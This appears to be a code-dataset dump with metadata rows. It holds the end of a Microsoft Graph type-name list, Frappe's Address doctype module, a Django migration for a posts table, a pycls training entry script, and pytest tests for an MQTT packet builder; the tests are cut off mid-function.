'Enum22',
'Enum220',
'Enum221',
'Enum222',
'Enum223',
'Enum224',
'Enum225',
'Enum226',
'Enum227',
'Enum228',
'Enum229',
'Enum23',
'Enum230',
'Enum231',
'Enum232',
'Enum233',
'Enum234',
'Enum235',
'Enum236',
'Enum237',
'Enum238',
'Enum239',
'Enum240',
'Enum241',
'Enum242',
'Enum243',
'Enum244',
'Enum245',
'Enum246',
'Enum247',
'Enum248',
'Enum249',
'Enum250',
'Enum251',
'Enum252',
'Enum253',
'Enum254',
'Enum255',
'Enum256',
'Enum257',
'Enum258',
'Enum259',
'Enum260',
'Enum261',
'Enum262',
'Enum263',
'Enum264',
'Enum265',
'Enum266',
'Enum267',
'Enum268',
'Enum269',
'Enum270',
'Enum271',
'Enum272',
'Enum273',
'Enum274',
'Enum275',
'Enum276',
'Enum277',
'Enum278',
'Enum279',
'Enum28',
'Enum280',
'Enum281',
'Enum282',
'Enum283',
'Enum284',
'Enum285',
'Enum286',
'Enum287',
'Enum288',
'Enum289',
'Enum29',
'Enum290',
'Enum291',
'Enum292',
'Enum293',
'Enum294',
'Enum295',
'Enum296',
'Enum297',
'Enum298',
'Enum299',
'Enum30',
'Enum300',
'Enum301',
'Enum302',
'Enum303',
'Enum304',
'Enum305',
'Enum306',
'Enum307',
'Enum308',
'Enum309',
'Enum31',
'Enum310',
'Enum311',
'Enum312',
'Enum313',
'Enum314',
'Enum315',
'Enum316',
'Enum317',
'Enum318',
'Enum319',
'Enum32',
'Enum320',
'Enum321',
'Enum322',
'Enum323',
'Enum324',
'Enum325',
'Enum326',
'Enum327',
'Enum328',
'Enum329',
'Enum33',
'Enum330',
'Enum331',
'Enum332',
'Enum333',
'Enum334',
'Enum335',
'Enum336',
'Enum337',
'Enum338',
'Enum339',
'Enum34',
'Enum340',
'Enum341',
'Enum342',
'Enum343',
'Enum344',
'Enum345',
'Enum346',
'Enum347',
'Enum348',
'Enum349',
'Enum35',
'Enum350',
'Enum351',
'Enum352',
'Enum353',
'Enum354',
'Enum355',
'Enum356',
'Enum357',
'Enum358',
'Enum359',
'Enum36',
'Enum360',
'Enum361',
'Enum362',
'Enum363',
'Enum364',
'Enum365',
'Enum366',
'Enum367',
'Enum368',
'Enum369',
'Enum37',
'Enum370',
'Enum371',
'Enum372',
'Enum373',
'Enum374',
'Enum375',
'Enum376',
'Enum377',
'Enum378',
'Enum379',
'Enum38',
'Enum380',
'Enum381',
'Enum382',
'Enum383',
'Enum384',
'Enum385',
'Enum386',
'Enum387',
'Enum388',
'Enum389',
'Enum39',
'Enum390',
'Enum391',
'Enum392',
'Enum393',
'Enum394',
'Enum395',
'Enum396',
'Enum397',
'Enum398',
'Enum399',
'Enum40',
'Enum400',
'Enum401',
'Enum402',
'Enum403',
'Enum404',
'Enum405',
'Enum406',
'Enum407',
'Enum408',
'Enum409',
'Enum41',
'Enum410',
'Enum411',
'Enum412',
'Enum413',
'Enum414',
'Enum415',
'Enum416',
'Enum417',
'Enum418',
'Enum419',
'Enum42',
'Enum420',
'Enum421',
'Enum422',
'Enum423',
'Enum424',
'Enum425',
'Enum426',
'Enum427',
'Enum428',
'Enum429',
'Enum43',
'Enum430',
'Enum431',
'Enum432',
'Enum433',
'Enum434',
'Enum435',
'Enum436',
'Enum437',
'Enum438',
'Enum439',
'Enum44',
'Enum440',
'Enum441',
'Enum442',
'Enum443',
'Enum444',
'Enum445',
'Enum446',
'Enum447',
'Enum448',
'Enum449',
'Enum45',
'Enum450',
'Enum451',
'Enum452',
'Enum453',
'Enum454',
'Enum455',
'Enum456',
'Enum457',
'Enum458',
'Enum459',
'Enum46',
'Enum460',
'Enum461',
'Enum462',
'Enum463',
'Enum464',
'Enum465',
'Enum466',
'Enum467',
'Enum468',
'Enum469',
'Enum47',
'Enum470',
'Enum471',
'Enum472',
'Enum473',
'Enum474',
'Enum475',
'Enum48',
'Enum49',
'Enum50',
'Enum51',
'Enum52',
'Enum53',
'Enum54',
'Enum55',
'Enum56',
'Enum57',
'Enum58',
'Enum59',
'Enum60',
'Enum61',
'Enum62',
'Enum63',
'Enum64',
'Enum65',
'Enum66',
'Enum67',
'Enum68',
'Enum69',
'Enum70',
'Enum71',
'Enum72',
'Enum73',
'Enum74',
'Enum75',
'Enum76',
'Enum77',
'Enum78',
'Enum79',
'Enum80',
'Enum81',
'Enum82',
'Enum83',
'Enum84',
'Enum85',
'Enum86',
'Enum87',
'Enum88',
'Enum89',
'Enum90',
'Enum91',
'Enum92',
'Enum93',
'Enum94',
'Enum95',
'Enum96',
'Enum97',
'Enum98',
'Enum99',
'Get10ItemsItem',
'Get1ItemsItem',
'Get2ItemsItem',
'Get4ItemsItem',
'Get5ItemsItem',
'Get6ItemsItem',
'Get7ItemsItem',
'Get9ItemsItem',
'MicrosoftGraphAttendeeType',
'MicrosoftGraphBodyType',
'MicrosoftGraphCalendarColor',
'MicrosoftGraphCalendarRoleType',
'MicrosoftGraphDayOfWeek',
'MicrosoftGraphEventType',
'MicrosoftGraphFreeBusyStatus',
'MicrosoftGraphImportance',
'MicrosoftGraphLocationType',
'MicrosoftGraphLocationUniqueIdType',
'MicrosoftGraphOnlineMeetingProviderType',
'MicrosoftGraphPhoneType',
'MicrosoftGraphPhysicalAddressType',
'MicrosoftGraphRecurrencePatternType',
'MicrosoftGraphRecurrenceRangeType',
'MicrosoftGraphResponseType',
'MicrosoftGraphSensitivity',
'MicrosoftGraphWeekIndex',
]
| true | true |
1c304aaf93f5966aee6fde13a1ac69ba893a3c51 | 8,774 | py | Python | frappe/contacts/doctype/address/address.py | Havenir/gppert-frappe | d302388ad15b36754a48c5d047d7515dad257b89 | [
"MIT"
] | null | null | null | frappe/contacts/doctype/address/address.py | Havenir/gppert-frappe | d302388ad15b36754a48c5d047d7515dad257b89 | [
"MIT"
] | 5 | 2020-07-20T01:13:34.000Z | 2022-02-10T21:49:18.000Z | frappe/contacts/doctype/address/address.py | Havenir/gppert-frappe | d302388ad15b36754a48c5d047d7515dad257b89 | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
# Copyright (c) 2015, Frappe Technologies and contributors
# For license information, please see license.txt
from __future__ import unicode_literals
import frappe
from frappe import throw, _
from frappe.utils import cstr
from frappe.model.document import Document
from jinja2 import TemplateSyntaxError
from frappe.utils.user import is_website_user
from frappe.model.naming import make_autoname
from frappe.core.doctype.dynamic_link.dynamic_link import deduplicate_dynamic_links
from six import iteritems, string_types
from past.builtins import cmp
from frappe.contacts.address_and_contact import set_link_title
import functools
class Address(Document):
def __setup__(self):
self.flags.linked = False
def autoname(self):
if not self.address_title:
if self.links:
self.address_title = self.links[0].link_name
if self.address_title:
self.name = (cstr(self.address_title).strip() + "-" + cstr(_(self.address_type)).strip())
if frappe.db.exists("Address", self.name):
self.name = make_autoname(cstr(self.address_title).strip() + "-" +
cstr(self.address_type).strip() + "-.#")
else:
throw(_("Address Title is mandatory."))
def validate(self):
self.link_address()
self.validate_reference()
set_link_title(self)
deduplicate_dynamic_links(self)
def link_address(self):
"""Link address based on owner"""
if not self.links and not self.is_your_company_address:
contact_name = frappe.db.get_value("Contact", {"email_id": self.owner})
if contact_name:
contact = frappe.get_cached_doc('Contact', contact_name)
for link in contact.links:
self.append('links', dict(link_doctype=link.link_doctype, link_name=link.link_name))
return True
return False
def validate_reference(self):
if self.is_your_company_address:
if not [row for row in self.links if row.link_doctype == "Company"]:
frappe.throw(_("Company is mandatory, as it is your company address"))
# removing other links
to_remove = [row for row in self.links if row.link_doctype != "Company"]
[ self.remove(row) for row in to_remove ]
def get_display(self):
return get_address_display(self.as_dict())
def has_link(self, doctype, name):
for link in self.links:
if link.link_doctype==doctype and link.link_name== name:
return True
def has_common_link(self, doc):
reference_links = [(link.link_doctype, link.link_name) for link in doc.links]
for link in self.links:
if (link.link_doctype, link.link_name) in reference_links:
return True
return False
@frappe.whitelist()
def get_default_address(doctype, name, sort_key='is_primary_address'):
'''Returns default Address name for the given doctype, name'''
if sort_key not in ['is_shipping_address', 'is_primary_address']:
return None
out = frappe.db.sql(""" SELECT
addr.name, addr.%s
FROM
`tabAddress` addr, `tabDynamic Link` dl
WHERE
dl.parent = addr.name and dl.link_doctype = %s and
dl.link_name = %s and ifnull(addr.disabled, 0) = 0
""" %(sort_key, '%s', '%s'), (doctype, name))
if out:
return sorted(out, key = functools.cmp_to_key(lambda x,y: cmp(y[1], x[1])))[0][0]
else:
return None
@frappe.whitelist()
def get_address_display(address_dict):
if not address_dict:
return
if not isinstance(address_dict, dict):
address_dict = frappe.db.get_value("Address", address_dict, "*", as_dict=True, cache=True) or {}
name, template = get_address_templates(address_dict)
try:
return frappe.render_template(template, address_dict)
except TemplateSyntaxError:
frappe.throw(_("There is an error in your Address Template {0}").format(name))
def get_territory_from_address(address):
"""Tries to match city, state and country of address to existing territory"""
if not address:
return
if isinstance(address, string_types):
address = frappe.get_cached_doc("Address", address)
territory = None
for fieldname in ("city", "state", "country"):
if address.get(fieldname):
territory = frappe.db.get_value("Territory", address.get(fieldname))
if territory:
break
return territory
def get_list_context(context=None):
return {
"title": _("Addresses"),
"get_list": get_address_list,
"row_template": "templates/includes/address_row.html",
'no_breadcrumbs': True,
}
def get_address_list(doctype, txt, filters, limit_start, limit_page_length = 20, order_by = None):
from frappe.www.list import get_list
user = frappe.session.user
ignore_permissions = False
if is_website_user():
if not filters: filters = []
add_name = []
contact = frappe.db.sql("""
select
address.name
from
`tabDynamic Link` as link
join
`tabAddress` as address on link.parent = address.name
where
link.parenttype = 'Address' and
link_name in(
select
link.link_name from `tabContact` as contact
join
`tabDynamic Link` as link on contact.name = link.parent
where
contact.user = %s)""",(user))
for c in contact:
add_name.append(c[0])
filters.append(("Address", "name", "in", add_name))
ignore_permissions = True
return get_list(doctype, txt, filters, limit_start, limit_page_length, ignore_permissions=ignore_permissions)
def has_website_permission(doc, ptype, user, verbose=False):
"""Returns true if there is a related lead or contact related to this document"""
contact_name = frappe.db.get_value("Contact", {"email_id": frappe.session.user})
if contact_name:
contact = frappe.get_doc('Contact', contact_name)
return contact.has_common_link(doc)
lead_name = frappe.db.get_value("Lead", {"email_id": frappe.session.user})
if lead_name:
return doc.has_link('Lead', lead_name)
return False
def get_address_templates(address):
result = frappe.db.get_value("Address Template", \
{"country": address.get("country")}, ["name", "template"])
if not result:
result = frappe.db.get_value("Address Template", \
{"is_default": 1}, ["name", "template"])
if not result:
frappe.throw(_("No default Address Template found. Please create a new one from Setup > Printing and Branding > Address Template."))
else:
return result
@frappe.whitelist()
def get_shipping_address(company, address = None):
filters = [
["Dynamic Link", "link_doctype", "=", "Company"],
["Dynamic Link", "link_name", "=", company],
["Address", "is_your_company_address", "=", 1]
]
fields = ["*"]
if address and frappe.db.get_value('Dynamic Link',
{'parent': address, 'link_name': company}):
filters.append(["Address", "name", "=", address])
address = frappe.get_all("Address", filters=filters, fields=fields) or {}
if address:
address_as_dict = address[0]
name, address_template = get_address_templates(address_as_dict)
return address_as_dict.get("name"), frappe.render_template(address_template, address_as_dict)
def get_company_address(company):
ret = frappe._dict()
ret.company_address = get_default_address('Company', company)
ret.company_address_display = get_address_display(ret.company_address)
return ret
def address_query(doctype, txt, searchfield, start, page_len, filters):
from frappe.desk.reportview import get_match_cond
link_doctype = filters.pop('link_doctype')
link_name = filters.pop('link_name')
condition = ""
for fieldname, value in iteritems(filters):
condition += " and {field}={value}".format(
field=fieldname,
value=value
)
meta = frappe.get_meta("Address")
searchfields = meta.get_search_fields()
if searchfield:
searchfields.append(searchfield)
search_condition = ''
for field in searchfields:
if search_condition == '':
search_condition += '`tabAddress`.`{field}` like %(txt)s'.format(field=field)
else:
search_condition += ' or `tabAddress`.`{field}` like %(txt)s'.format(field=field)
return frappe.db.sql("""select
`tabAddress`.name, `tabAddress`.city, `tabAddress`.country
from
`tabAddress`, `tabDynamic Link`
where
`tabDynamic Link`.parent = `tabAddress`.name and
`tabDynamic Link`.parenttype = 'Address' and
`tabDynamic Link`.link_doctype = %(link_doctype)s and
`tabDynamic Link`.link_name = %(link_name)s and
ifnull(`tabAddress`.disabled, 0) = 0 and
({search_condition})
{mcond} {condition}
order by
if(locate(%(_txt)s, `tabAddress`.name), locate(%(_txt)s, `tabAddress`.name), 99999),
`tabAddress`.idx desc, `tabAddress`.name
limit %(start)s, %(page_len)s """.format(
mcond=get_match_cond(doctype),
key=frappe.db.escape(searchfield),
search_condition = search_condition,
condition=condition or ""),
{
'txt': "%%%s%%" % frappe.db.escape(txt),
'_txt': txt.replace("%", ""),
'start': start,
'page_len': page_len,
'link_name': link_name,
'link_doctype': link_doctype
})
| 31.224199 | 134 | 0.713928 |
from __future__ import unicode_literals
import frappe
from frappe import throw, _
from frappe.utils import cstr
from frappe.model.document import Document
from jinja2 import TemplateSyntaxError
from frappe.utils.user import is_website_user
from frappe.model.naming import make_autoname
from frappe.core.doctype.dynamic_link.dynamic_link import deduplicate_dynamic_links
from six import iteritems, string_types
from past.builtins import cmp
from frappe.contacts.address_and_contact import set_link_title
import functools
class Address(Document):
def __setup__(self):
self.flags.linked = False
def autoname(self):
if not self.address_title:
if self.links:
self.address_title = self.links[0].link_name
if self.address_title:
self.name = (cstr(self.address_title).strip() + "-" + cstr(_(self.address_type)).strip())
if frappe.db.exists("Address", self.name):
self.name = make_autoname(cstr(self.address_title).strip() + "-" +
cstr(self.address_type).strip() + "-.#")
else:
throw(_("Address Title is mandatory."))
def validate(self):
self.link_address()
self.validate_reference()
set_link_title(self)
deduplicate_dynamic_links(self)
def link_address(self):
if not self.links and not self.is_your_company_address:
contact_name = frappe.db.get_value("Contact", {"email_id": self.owner})
if contact_name:
contact = frappe.get_cached_doc('Contact', contact_name)
for link in contact.links:
self.append('links', dict(link_doctype=link.link_doctype, link_name=link.link_name))
return True
return False
def validate_reference(self):
if self.is_your_company_address:
if not [row for row in self.links if row.link_doctype == "Company"]:
frappe.throw(_("Company is mandatory, as it is your company address"))
to_remove = [row for row in self.links if row.link_doctype != "Company"]
[ self.remove(row) for row in to_remove ]
def get_display(self):
return get_address_display(self.as_dict())
def has_link(self, doctype, name):
for link in self.links:
if link.link_doctype==doctype and link.link_name== name:
return True
def has_common_link(self, doc):
reference_links = [(link.link_doctype, link.link_name) for link in doc.links]
for link in self.links:
if (link.link_doctype, link.link_name) in reference_links:
return True
return False
@frappe.whitelist()
def get_default_address(doctype, name, sort_key='is_primary_address'):
if sort_key not in ['is_shipping_address', 'is_primary_address']:
return None
out = frappe.db.sql(""" SELECT
addr.name, addr.%s
FROM
`tabAddress` addr, `tabDynamic Link` dl
WHERE
dl.parent = addr.name and dl.link_doctype = %s and
dl.link_name = %s and ifnull(addr.disabled, 0) = 0
""" %(sort_key, '%s', '%s'), (doctype, name))
if out:
return sorted(out, key = functools.cmp_to_key(lambda x,y: cmp(y[1], x[1])))[0][0]
else:
return None
@frappe.whitelist()
def get_address_display(address_dict):
if not address_dict:
return
if not isinstance(address_dict, dict):
address_dict = frappe.db.get_value("Address", address_dict, "*", as_dict=True, cache=True) or {}
name, template = get_address_templates(address_dict)
try:
return frappe.render_template(template, address_dict)
except TemplateSyntaxError:
frappe.throw(_("There is an error in your Address Template {0}").format(name))
def get_territory_from_address(address):
if not address:
return
if isinstance(address, string_types):
address = frappe.get_cached_doc("Address", address)
territory = None
for fieldname in ("city", "state", "country"):
if address.get(fieldname):
territory = frappe.db.get_value("Territory", address.get(fieldname))
if territory:
break
return territory
def get_list_context(context=None):
return {
"title": _("Addresses"),
"get_list": get_address_list,
"row_template": "templates/includes/address_row.html",
'no_breadcrumbs': True,
}
def get_address_list(doctype, txt, filters, limit_start, limit_page_length = 20, order_by = None):
from frappe.www.list import get_list
user = frappe.session.user
ignore_permissions = False
if is_website_user():
if not filters: filters = []
add_name = []
contact = frappe.db.sql("""
select
address.name
from
`tabDynamic Link` as link
join
`tabAddress` as address on link.parent = address.name
where
link.parenttype = 'Address' and
link_name in(
select
link.link_name from `tabContact` as contact
join
`tabDynamic Link` as link on contact.name = link.parent
where
contact.user = %s)""",(user))
for c in contact:
add_name.append(c[0])
filters.append(("Address", "name", "in", add_name))
ignore_permissions = True
return get_list(doctype, txt, filters, limit_start, limit_page_length, ignore_permissions=ignore_permissions)
def has_website_permission(doc, ptype, user, verbose=False):
contact_name = frappe.db.get_value("Contact", {"email_id": frappe.session.user})
if contact_name:
contact = frappe.get_doc('Contact', contact_name)
return contact.has_common_link(doc)
lead_name = frappe.db.get_value("Lead", {"email_id": frappe.session.user})
if lead_name:
return doc.has_link('Lead', lead_name)
return False
def get_address_templates(address):
result = frappe.db.get_value("Address Template", \
{"country": address.get("country")}, ["name", "template"])
if not result:
result = frappe.db.get_value("Address Template", \
{"is_default": 1}, ["name", "template"])
if not result:
frappe.throw(_("No default Address Template found. Please create a new one from Setup > Printing and Branding > Address Template."))
else:
return result
@frappe.whitelist()
def get_shipping_address(company, address = None):
filters = [
["Dynamic Link", "link_doctype", "=", "Company"],
["Dynamic Link", "link_name", "=", company],
["Address", "is_your_company_address", "=", 1]
]
fields = ["*"]
if address and frappe.db.get_value('Dynamic Link',
{'parent': address, 'link_name': company}):
filters.append(["Address", "name", "=", address])
address = frappe.get_all("Address", filters=filters, fields=fields) or {}
if address:
address_as_dict = address[0]
name, address_template = get_address_templates(address_as_dict)
return address_as_dict.get("name"), frappe.render_template(address_template, address_as_dict)
def get_company_address(company):
ret = frappe._dict()
ret.company_address = get_default_address('Company', company)
ret.company_address_display = get_address_display(ret.company_address)
return ret
def address_query(doctype, txt, searchfield, start, page_len, filters):
from frappe.desk.reportview import get_match_cond
link_doctype = filters.pop('link_doctype')
link_name = filters.pop('link_name')
condition = ""
for fieldname, value in iteritems(filters):
condition += " and {field}={value}".format(
field=fieldname,
value=value
)
meta = frappe.get_meta("Address")
searchfields = meta.get_search_fields()
if searchfield:
searchfields.append(searchfield)
search_condition = ''
for field in searchfields:
if search_condition == '':
search_condition += '`tabAddress`.`{field}` like %(txt)s'.format(field=field)
else:
search_condition += ' or `tabAddress`.`{field}` like %(txt)s'.format(field=field)
return frappe.db.sql("""select
`tabAddress`.name, `tabAddress`.city, `tabAddress`.country
from
`tabAddress`, `tabDynamic Link`
where
`tabDynamic Link`.parent = `tabAddress`.name and
`tabDynamic Link`.parenttype = 'Address' and
`tabDynamic Link`.link_doctype = %(link_doctype)s and
`tabDynamic Link`.link_name = %(link_name)s and
ifnull(`tabAddress`.disabled, 0) = 0 and
({search_condition})
{mcond} {condition}
order by
if(locate(%(_txt)s, `tabAddress`.name), locate(%(_txt)s, `tabAddress`.name), 99999),
`tabAddress`.idx desc, `tabAddress`.name
limit %(start)s, %(page_len)s """.format(
mcond=get_match_cond(doctype),
key=frappe.db.escape(searchfield),
search_condition = search_condition,
condition=condition or ""),
{
'txt': "%%%s%%" % frappe.db.escape(txt),
'_txt': txt.replace("%", ""),
'start': start,
'page_len': page_len,
'link_name': link_name,
'link_doctype': link_doctype
})
| true | true |
1c304b135783e9e7dc654907e0b2aebe5f5bcd11 | 863 | py | Python | post/migrations/0001_initial.py | Yash1256/Django-Intern | c1d42ff344324b56d462ae8c3d5b6682a2b255b6 | [
"MIT"
] | 1 | 2020-10-03T21:38:39.000Z | 2020-10-03T21:38:39.000Z | post/migrations/0001_initial.py | Yash1256/Django-Intern | c1d42ff344324b56d462ae8c3d5b6682a2b255b6 | [
"MIT"
] | 3 | 2021-04-08T19:53:55.000Z | 2021-06-10T18:45:15.000Z | post/migrations/0001_initial.py | Yash1256/Django-Intern | c1d42ff344324b56d462ae8c3d5b6682a2b255b6 | [
"MIT"
] | 1 | 2021-01-11T10:28:25.000Z | 2021-01-11T10:28:25.000Z | # Generated by Django 3.0.4 on 2020-03-06 22:37
from django.db import migrations, models
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='Post',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('author_id', models.IntegerField()),
('title', models.CharField(max_length=255)),
('description', models.CharField(max_length=500)),
('content', models.TextField()),
('date', models.DateField()),
],
options={
'verbose_name': 'Post',
'verbose_name_plural': 'Posts',
'db_table': 'posts',
},
),
]
| 27.83871 | 114 | 0.515643 |
from django.db import migrations, models
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='Post',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('author_id', models.IntegerField()),
('title', models.CharField(max_length=255)),
('description', models.CharField(max_length=500)),
('content', models.TextField()),
('date', models.DateField()),
],
options={
'verbose_name': 'Post',
'verbose_name_plural': 'Posts',
'db_table': 'posts',
},
),
]
| true | true |
1c304b1d8299295e1ead2d47ec6dd4e57fee0493 | 920 | py | Python | tools/train_net.py | PeterouZh/pycls | 8058334801c140fa8c6f0dc29276c02f71ee054d | [
"MIT"
] | null | null | null | tools/train_net.py | PeterouZh/pycls | 8058334801c140fa8c6f0dc29276c02f71ee054d | [
"MIT"
] | null | null | null | tools/train_net.py | PeterouZh/pycls | 8058334801c140fa8c6f0dc29276c02f71ee054d | [
"MIT"
] | null | null | null | #!/usr/bin/env python3
# Copyright (c) Facebook, Inc. and its affiliates.
#
# This source code is licensed under the MIT license found in the
# LICENSE file in the root directory of this source tree.
"""Train a classification model."""
import importlib
import pycls.core.config as config
import pycls.core.distributed as dist
import pycls.core.trainer as trainer
from pycls.core.config import cfg
from template_lib.v2.config import global_cfg
from template_lib.d2.utils import D2Utils
def main():
config.load_cfg_fom_args("Train a classification model.")
config.assert_and_infer_cfg()
D2Utils.cfg_merge_from_easydict(cfg, global_cfg)
cfg.freeze()
trainer_module = cfg.get('trainer_module', 'pycls.core.trainer')
trainer_module = importlib.import_module(trainer_module)
dist.multi_proc_run(num_proc=cfg.NUM_GPUS, fun=trainer_module.train_model)
if __name__ == "__main__":
main()
| 27.058824 | 78 | 0.767391 |
import importlib
import pycls.core.config as config
import pycls.core.distributed as dist
import pycls.core.trainer as trainer
from pycls.core.config import cfg
from template_lib.v2.config import global_cfg
from template_lib.d2.utils import D2Utils
def main():
config.load_cfg_fom_args("Train a classification model.")
config.assert_and_infer_cfg()
D2Utils.cfg_merge_from_easydict(cfg, global_cfg)
cfg.freeze()
trainer_module = cfg.get('trainer_module', 'pycls.core.trainer')
trainer_module = importlib.import_module(trainer_module)
dist.multi_proc_run(num_proc=cfg.NUM_GPUS, fun=trainer_module.train_model)
if __name__ == "__main__":
main()
| true | true |
1c304b23fc86014316f65986beeb37440af6a5df | 9,744 | py | Python | tests/test_building.py | jlitzingerdev/mqttpacket | d6fbb84ef24c5c5bc9798692206e074a2dbf3af6 | [
"MIT"
] | null | null | null | tests/test_building.py | jlitzingerdev/mqttpacket | d6fbb84ef24c5c5bc9798692206e074a2dbf3af6 | [
"MIT"
] | 1 | 2021-06-01T22:38:18.000Z | 2021-06-01T22:38:18.000Z | tests/test_building.py | jlitzingerdev/mqttpacket | d6fbb84ef24c5c5bc9798692206e074a2dbf3af6 | [
"MIT"
] | 1 | 2020-03-15T03:57:21.000Z | 2020-03-15T03:57:21.000Z | # -*- coding: utf-8 -*-
"""
Copyright 2018 Jason Litzinger
See LICENSE for details.
"""
import binascii
import json
import six
import pytest
import mqttpacket.v311 as mqttpacket
def test_connect_basic():
"""
A connect packet with only a client id is properly constructed.
"""
expect = binascii.unhexlify(
b'101000044d5154540402003c000474657374'
)
packet = mqttpacket.connect(u'test')
assert packet == expect
assert isinstance(packet, bytes)
assert len(packet) == 18
assert six.indexbytes(packet, 0) == 16
assert six.indexbytes(packet, 9) == 0x02
assert packet[14:].decode('utf-8') == u'test'
def test_will_requirements():
"""
Will topic and will message must be set together.
"""
with pytest.raises(ValueError):
mqttpacket.ConnectSpec(
will_topic=u'foo',
)
with pytest.raises(ValueError):
mqttpacket.ConnectSpec(
will_message=u'my message',
)
def test_valid_will():
"""
A valid will topic/message spec sets flags and payload.
"""
cs = mqttpacket.ConnectSpec(
will_topic=u'my_will_topic',
will_message=u'my_will_message',
will_qos=1,
)
wt = u'my_will_topic'
wm = u'my_will_message'
assert cs.will_topic == wt
assert cs.will_message == wm
assert cs.flags() == 0x0e
assert len(cs.payload()) == 32
cs = mqttpacket.ConnectSpec(
will_topic=u'wt2',
will_message=u'wm2',
will_qos=2,
)
assert cs.will_topic == u'wt2'
assert cs.will_message == u'wm2'
assert cs.flags() == 0x16
def test_default_spec():
"""
A default spec has a remaining length of zero and
a clean session.
"""
cs = mqttpacket.ConnectSpec()
assert not cs.payload()
assert cs.flags() == 0x02
def test_will_must_be_unicode():
"""
Will topic and will message must be unicode.
"""
with pytest.raises(TypeError):
mqttpacket.ConnectSpec(
will_topic=b'foo',
will_message=u'bar'
)
with pytest.raises(TypeError):
mqttpacket.ConnectSpec(
will_topic=u'biz',
will_message=b'baz'
)
def test_will_qos_values():
"""
Will QOS can only be 0 - 2
"""
with pytest.raises(ValueError):
mqttpacket.ConnectSpec(
will_topic=u'biz',
will_message=u'baz',
will_qos=3
)
mqttpacket.ConnectSpec(
will_topic=u'my_will_topic',
will_message=u'my_will_message',
will_qos=1
)
mqttpacket.ConnectSpec(
will_topic=u'my_will_topic',
will_message=u'my_will_message',
will_qos=2
)
def test_connect_with_spec():
"""
A valid connect spec is properly encoded.
"""
cs = mqttpacket.ConnectSpec(
will_topic=u'my_will_topic',
will_message=u'my_will_message',
will_qos=1,
)
packet = mqttpacket.connect(u'test', connect_spec=cs)
assert isinstance(packet, bytes)
assert len(packet) == 50
assert six.indexbytes(packet, 0) == 16
assert six.indexbytes(packet, 9) == 0x0e
assert packet[14:18].decode('utf-8') == u'test'
def test_build_subscription_multiple():
"""
Multiple topic filters can be properly encoded.
This example is from the MQTT specification.
"""
specs = [
mqttpacket.SubscriptionSpec(u'a/b', 0x01),
mqttpacket.SubscriptionSpec(u'c/d', 0x02),
]
packet = mqttpacket.subscribe(10, specs)
assert isinstance(packet, bytes)
assert six.indexbytes(packet, 0) == 0x82
assert six.indexbytes(packet, 1) == 14
assert six.indexbytes(packet, 2) << 8 | six.indexbytes(packet, 3) == 10
assert six.indexbytes(packet, 4) << 8 | six.indexbytes(packet, 5) == 3
assert packet[6:9].decode('utf-8') == u'a/b'
assert six.indexbytes(packet, 9) == 0x01
assert six.indexbytes(packet, 10) << 8 | six.indexbytes(packet, 11) == 3
assert packet[12:15].decode('utf-8') == u'c/d'
assert six.indexbytes(packet, 15) == 0x02
def test_build_subscription_single():
"""
Multiple topic filters can be properly encoded.
This example is from the MQTT specification.
"""
specs = [
mqttpacket.SubscriptionSpec(u'test/1', 0x00),
]
packet = mqttpacket.subscribe(10, specs)
assert isinstance(packet, bytes)
assert six.indexbytes(packet, 0) == 0x82
assert six.indexbytes(packet, 1) == 11
assert six.indexbytes(packet, 2) << 8 | six.indexbytes(packet, 3) == 10
assert six.indexbytes(packet, 4) << 8 | six.indexbytes(packet, 5) == 6
assert packet[6:12].decode('utf-8') == u'test/1'
assert six.indexbytes(packet, 12) == 0x00
def test_subscription_spec_multibyte():
"""
A topic with multibyte characters encoded as UTF uses
the encoded length.
"""
topic = u'super€'
spec = mqttpacket.SubscriptionSpec(
topic,
0
)
assert spec.remaining_len() == 11
assert spec.to_bytes() == b'\x00\x08\x73\x75\x70\x65\x72\xe2\x82\xac\x00'
def test_encode_single_byte_length():
"""
A length < 128 is encoded in a single byte.
"""
r = mqttpacket.encode_remainining_length(127)
assert r == b'\x7f'
r = mqttpacket.encode_remainining_length(0)
assert r == b'\x00'
def test_encode_two_byte_length():
"""
A length over 127 is encoded with two bytes.
"""
r = mqttpacket.encode_remainining_length(128)
assert r == b'\x80\x01'
r = mqttpacket.encode_remainining_length(16383)
assert r == b'\xff\x7f'
def test_encode_three_byte_length():
"""
A length over 16383 is encoded with three bytes.
"""
r = mqttpacket.encode_remainining_length(16384)
assert r == b'\x80\x80\x01'
r = mqttpacket.encode_remainining_length(2097151)
assert r == b'\xff\xff\x7f'
def test_encode_four_byte_length():
"""
A length over 2097151 is encoded with four bytes.
"""
r = mqttpacket.encode_remainining_length(2097152)
assert r == b'\x80\x80\x80\x01'
r = mqttpacket.encode_remainining_length(268435455)
assert r == b'\xff\xff\xff\x7f'
def test_disconnect():
"""
A valid DISCONNECT packet is built.
"""
assert mqttpacket.disconnect() == b'\xe0\x00'
def test_publish():
"""
A valid PUBLISH packet is successfully decoded.
"""
payload = {u'test': u'test'}
payload_str = json.dumps(payload).encode('utf-8')
publish = mqttpacket.publish(
u'test',
False,
0,
True,
payload_str
)
print(binascii.hexlify(publish))
assert six.indexbytes(publish, 0) == 49
assert six.indexbytes(publish, 1) == 22
expect = binascii.unhexlify(
b'31160004746573747b2274657374223a202274657374227d'
)
assert publish == expect
def test_publish_nonzero_qos_requires_packetid():
"""
A PUBLISH packet with a QoS of 1 or 2 requires a packet id.
"""
with pytest.raises(ValueError):
mqttpacket.publish(
u'test',
False,
1,
True,
u'foo'.encode('utf-8')
)
with pytest.raises(ValueError):
mqttpacket.publish(
u'test',
False,
2,
True,
u'foo'.encode('utf-8')
)
def test_publish_qos_1():
"""
A publish with a QoS of 1 and a packet id are successfully encoded.
"""
publish = mqttpacket.publish(
u'test',
False,
1,
True,
u'foo'.encode('utf-8'),
packet_id=255
)
expect = binascii.unhexlify(
b'330b00047465737400ff666f6f'
)
assert publish == expect
def test_publish_qos_2():
"""
A publish with a QoS of 2 and a packet id are successfully encoded.
"""
publish = mqttpacket.publish(
u'test',
False,
2,
False,
u'foo'.encode('utf-8'),
packet_id=256
)
expect = binascii.unhexlify(
b'340b0004746573740100666f6f'
)
assert publish == expect
def test_publish_dup():
"""
A publish with dup set is successfully encoded
"""
publish = mqttpacket.publish(
u'test',
True,
1,
